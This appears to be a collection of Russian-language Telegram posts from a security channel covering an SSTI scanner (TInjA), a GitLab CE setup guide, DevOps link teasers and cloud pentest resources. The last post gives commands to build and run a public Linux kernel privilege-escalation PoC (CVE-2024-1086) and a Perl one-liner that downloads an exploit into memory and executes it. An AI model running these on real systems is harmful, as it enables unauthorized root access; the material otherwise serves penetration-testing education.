⚙️ Возвращаемся к пентесту и DAST-у

У меня вновь появилась тяга к тыканью кавычек и проведению ресёрчей не только по SCA (этим занимался около 2-х последних месяцев).

Худший язык для сбора транзитивных зависимостей — python (за исключением модулей poetry). Нашел замечательный выход из ситуации — venv + <инструмент про который скоро расскажу> + скрипт на Go (опционально)

Так вот, к чему я это всё? Я начинаю перерабатывать список своих инструментов и новых возможностей в них (Да-да нуклеи, это я про тебя и твои возможности в 3.2). А сегодня предлагаю начать с чего-нибудь известного и того, что помогает мне в обнаружении SSTI (ещё CSTI, но в меньшей степени).

👩‍❤️‍👨 Для самых маленьких

SSTI (Server-Side Template Injection) — это когда злоумышленник может вставить вредоносный код в шаблон на сайте, который затем выполняется сервером. Это как если бы вы дали кому-то возможность написать что-то на вашей доске объявлений, и вместо обычного сообщения они написали команду, заставившую вашу доску сделать что-то нехорошее.

Да, вы не ошиблись, подобные сноски станут нормой, ведь нужно помогать новым людям в нашем сообществе получать новую информацию.

🤨 Так чем же нам искать SSTI ? Ручками

TInjA — это CLI-инструмент для проверки веб-страниц на наличие уязвимостей инъекций шаблонов. Он поддерживает ✍️✍️ наиболее актуальных шаблонизатора (по состоянию на сентябрь 2023 года) для восьми различных языков программирования.

Ссылка на GitHub 💻 — ТЫК

🤨 Так что же в нем такого, ведь у нас есть множество альтернатив

Изначально я хотел сравнить в тестах TInjA и tplmap, но время и ограничение на количество символов в посте подкачали.

Интересный факт — TPLMap это сокращение от Template Mapper, а также это не просто инструмент для поиска и эксплуатации SSTI, но ещё и хороший помощник в раскрутке RCE через SSTI

Начнем с установки и настройки нашего инструмента

go install -v github.com/Hackmanit/TInjA@1.1.3

Да в прочем-то и всё, он готов к работе... Но мы не забудем про настройки (он подходит даже для интеграции в пайплайн 💻)

--header/-H задает заголовки, которые должны быть добавлены к запросу.

--cookie/-c указывает cookie, которые должны быть добавлены в запрос.

--data/-d указывает POST-тело, которое должно быть добавлено к запросу.

💡 Но чем же он меня зацепил

А тем, что он написан на 💻, а также имеет функцию подгрузки конфига из JSON файла, что мне очень нравится. Нам всего лишь нужно выбрать специфичный флаг при запуске tinja jsonl -j "/path/to/file"

{
"request":{
    "method":"POST",
    "endpoint":"http://example.com/path",
    "body":"name=admin",
    "headers":{
        "Content-Type":"application/x-www-form-urlencoded"
    }
}

😜Также присутствует редкое сканирование CSTI через флаг --csti

Важно отметить, что для сканирования CSTI используется headless-браузер, что может увеличить использование оперативной памяти и процессора. Учитывайте это при работе с докерами 💻.

И, наконец, классное дополнение, если у Вас сложная сеть с проксями и подобным (или вам надо прогнать это через бурп) — настройка прокси

--proxyurl указывает URL и порт прокси-сервера, который будет использоваться для сканирования. 
tinja url -u "http://example.com/" --proxyurl "http://127.0.0.1:8080"

--proxycertpath указывает сертификат CA прокси в формате PEM (необходим при сканировании HTTPS-адресов).  
tinja url -u "http://example.com/" --proxyurl "http://127.0.0.1:8080" --proxycertpath "/path/to/file/cacert.pem"

Для сканирования HTTPS-адресов с помощью прокси необходим сертификат CA прокси в формате PEM. Сертификаты Burp Suite CA предоставляются, например, в формате DER и чтобы это нормально работало, делаем следующее:

openssl x509 -inform DER -outform PEM -text -in cacert.der -out cacert.pem

🤨 Так почему мы должны использовать именно его ?

Вкусовщина, но он облегчит вашу жизнь если:
➡️ У вас есть пайплайны(хорошо интегрируется и быстро работает)
➡️ Вы открыты к новым инструментам в работе (Go инструмент с легкой настройкой)
➡️ Вы занимаетесь ББ (большое количество поддерживаемых шаблонизаторов)

#redteam

👋 Ищу дизайнера по стикерпакам

От меня:
1. Оплата: договорная, справедливая
2. Цель: сделать стикерпак для tg, сделать стикерпак физический
3. Референсы: есть

От вас:
0. Терпение :D
1. Ваше портфолио
2. Понимание IT области, желательно ИБ
3. Умение делать анимированные стикеры будет плюсом

Тестовая задача: у канала уже есть эмоджи. Необходимо перерисовать новогодние эмоджи и добавить пару новых

Напишите сразу в ЛС @szybnev, если берётесь за тестовую задачу и мы обговорим сроки и условия)

🤓 Установка Gitlab CE + Gitlab Runner + Gitlab Registry 🖼️
#devsecops #devops #разработка

GitLab — инструмент для совместной работы над проектами разработки программного обеспечения. Он обеспечивает хранение и управление репозиториями Git, а также контроль версий программного кода. GitLab автоматизирует процессы CI/CD: сборку, тестирование и развертывание ПО. Для запуска и автоматического выполнения задач CI/CD в GitLab используется приложение GitLab Runner.

⚖️ Подготовка:
1. Вам нужен сервер на 🖥 Ubuntu 22.04 с минимальными характеристиками 4 Гб ОЗУ и 4 ядра. Я же рекомендую 8 Гб ОЗУ и 8 Ядер.
2. Вам нужен домен.
3. В доменном регистраторе сделайте 2 поддомена: gitlab. и registry.gitlab. и создайте A записи с IP своего сервера
4. Выполнить минимальную настройку по этому гайду и выполнить ssh-keygen -t ed25519

📌 ed25519 более новый стандарт, чем RSA и сейчас best practice использовать этот алгоритм

⚖️ После настройки сервера:
5. Создаете нового пользователя, выдаёте права и добавляете свой ssh ключ в ~/.ssh/authorized_keys
6. Установим zsh как оболочку по умолчанию: chsh -s /bin/zsh
7. Замените в /etc/ssh/sshd_config с # Port 22 на Port 4422. Чтобы наш ssh сервер не мешал гитлабовскому
9. Отключим IPv6 для ufw
sed -i 's+IPV6=yes+IPV6=no+g' /etc/default/ufw
8. Добавьте необходимые порты в ufw: ufw allow 80; ufw allow 443; ufw allow 22; ufw allow 4422; ufw enable и тыкаете y
9. Далее создаете docker-compose.yml

version: '3.8'
services:
  gitlab:
    container_name: gitlab-ce
    image: 'gitlab/gitlab-ce:latest'
    restart: always
    hostname: 'gitlab-ce'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'https://gitlab.redacted.com'
        registry_external_url 'https://registry.gitlab.redacted.com'
        gitlab_rails['registry_enabled'] = true
        letsencrypt['enable'] = true
        letsencrypt['contact_emails'] = ['ВАША_ПОЧТА']
        letsencrypt['auto_renew'] = true
    ports:
      - '80:80'
      - '443:443'
      - '22:22'
    volumes:
      - '/opt/gitlab/config:/etc/gitlab'
      - '/opt/gitlab/logs:/var/log/gitlab'
      - '/opt/gitlab/data:/var/opt/gitlab'
    networks:
      - gitlab

  gitlab-runner:
    container_name: gitlab-runner
    image: gitlab/gitlab-runner:latest
    restart: always
    hostname: 'gitlab-runner'
    depends_on:
      - gitlab
    volumes:
      - '/opt/gitlab-runner/data:/home/gitlab_ci_multi_runner/data'
      - '/opt/gitlab-runner/config:/etc/gitlab-runner'
      - '/var/run/docker.sock:/var/run/docker.sock:rw'
    environment:
      - CI_SERVER_URL=https://gitlab.redacted.com/ci
    networks:
      - gitlab

networks:
  gitlab:
    name: gitlab-network

10. Запускаете конфигурацию docker compose up -d . И ждём... Если скучно, то можно следить за ходом установки docker logs --follow gitlab-ce

12. Посмотрим пасс от аккаунта админа: grep 'Password: ' /opt/gitlab/config/initial_root_password
13. Переходим на gitlab.redacted.com и авторизуемся root:пасс_из_файла

Если всё получилось поднимаю за вас бокал гранатового вина 🍷
Если не получилось, то несу вам тонометр

⚖️ Настройка Gitlab:
0. Проверяем, что все нужные сервисы запустились в разделе Features и потом проверяем health_check
1. Сразу отключаем регистрацию других пользователей (хоть им и потребуется подтверждение от админа, но кто знает какая CVE будет в будущем). Для этого идём сюда и в разделе Sign-up restrictions убираем галочку у Sign-up enabled
2. Далее создадим своего пользователя. Обязательно ставим, что пользователь Administrator
2.1. Возвращаемся на шаг назад и нажимаем Edit по пользователю и задаем ему пароль
3. Логинимся под новым аккаунтом, нас попросит изменить пароль, но мы можем указать во все 3 поля одинаковый пароль
4. Удаляем пользователя root
5. Настроим рейт лимиты. Я поставил 10 запросов на IP и бан на 24 часа + поставил веселый текст для тех, кто будет фаззить мой сервер :))
6. Отключил рекламу и по фану поставил себе первый рабочий день Monday

⚖️ Далее можете поставить себе темную тему, добавить свои ssh ключи и радоваться жизни с полноценным Gitlab CE

🌚 @poxek

Disaster Recovery Plan: Как правильно заваривать чай, когда горит серверная
#риски #devops

В жизни любого проекта наступает катастрофа. Мы не можем заранее знать, что именно это будет - короткое замыкание в серверной, инженер, дропнувший центральную БД или нашествие бобров. Тем не менее, оно обязательно случится, причем по предельно идиотской причине.

Насчет бобров, я, кстати, не шутил. В Канаде они перегрызли кабель и оставили целый район Tumbler Ridge без оптоволоконной связи. Причем, животные, как мне кажется, делают все для того, чтобы внезапно лишить вас доступа к вашим ресурсам:

Макаки жуют провода
Цикады принимают кабели за ветки, и расковыривают их, чтобы отложить внутрь яйца.
Акулы жуют трансатлантические кабели Google
А в топе источника проблем для крупной телекоммуникационной компании Level 3 Communications вообще были белки.

➡️ Читать далее

🌚 @poxek

Будущее Kubernetes и DevOps: строим прогнозы на 10 лет
#devops #k8s #docker

Мы спросили инженеров «Фланта» и экспертов из индустрии, как, по их мнению, будут развиваться Kubernetes, DevOps, Ops и Cloud Native-экосистема в ближайшее десятилетие. Наша задача была спрогнозировать будущее на основе тенденций в настоящем, а не просто «заглянуть в хрустальный шар» и пофантазировать. В результате родилась эта статья. Присоединяйтесь к нам в комментариях — давайте вместе подумаем, как будут выглядеть важные в нашей работе инструменты через 5–10 лет.

➡️ Читать далее

🌚 @poxek

Настройка CI/CD для самых маленьких разработчиков
#devops #k8s #docker #CICD

Считается, что построение CI/CD - задача для DevOps. Глобально это действительно так, особенно если речь идет о первоначальной настройке. Но часто с докручиванием отдельных этапов процесса сталкиваются и разработчики. Умение поправить что-то незначительное своими силами позволяет не тратить время на поход к коллегам (и ожидание их реакции), т.е. в целом повышает комфорт работы и дает понимание, почему все происходит именно так.

Настроек для пайплайна Gitlab очень много. В этой статье, не вдаваясь в недра тюнинга, поговорим о том, как выглядит скрипт пайплайна, из каких блоков он состоит и что может содержать.

➡️ Читать далее

🌚 @poxek

Kerberos простыми словами
#windows #kerberos #AD

Несмотря на то, что уже существует множество различных статей про Kerberos, я всё‑таки решил написать ещё одну. Прежде всего эта статья написана для меня лично: я захотел обобщить знания, полученные в ходе изучения других статей, документации, а также в ходе практического использования Kerberos. Однако я также надеюсь, что статья будет полезна всем её читателям и кто‑то найдёт в ней новую и полезную информацию.

Данную статью я написал после того, как сделал собственную библиотеку, генерирующую сообщения протокола Kerberos, а также после того, как я сделал и протестировал «стандартный клиент» Kerberos в Windows — набор функций SSPI. Я научился тестировать произвольные конфигурации сервисов при всех возможных видах делегирования. Я нашёл способ, как выполнять пре‑аутентификацию в Windows как с применением имени пользователя и пароля, так и с помощью PKINIT. Я также сделал библиотеку, которая умещает «стандартный» код для запроса к SSPI в 3–5 строк вместо, скажем, 50-ти.

by @yurystrozhevsky

➡️ Читать далее

🌚 @poxek

☁️ Список ресурсов для обучения/практики пентеста облаков
#cloud #red_team #lab #cheatsheet

Поиск данный репы вдохновлен тем, что по работе был проект, где заказчик использовал Azure в качестве инфраструктуры и множество сервисов на AWS. По сути в РФ уже такое не встретишь, хоть в своё время изучал AWS и учился разворачивать различные бакеты, но уже подзабылось за ненадобностью

👍 В этом репозитории сможете найти cheatsheet'ы, различные ресурсы для изучения, инструменты для пентеста, а самое прикольное, это лабы!

А также, данный репозиторий собрал в себе информацию по:
AWS
GCP
Azure
Kubernetes

💻 Github

🎁 Бонус:
Awesome Cloud Security Labs - репозиторий, с подборкой лаб для практики похека cloud провайдеров. Есть как self hosted, так и HTB like.

🌚 @poxek

Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc

PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.

PoC:

git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit

Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:

perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE

➡️ Github PoC

🌚 @poxek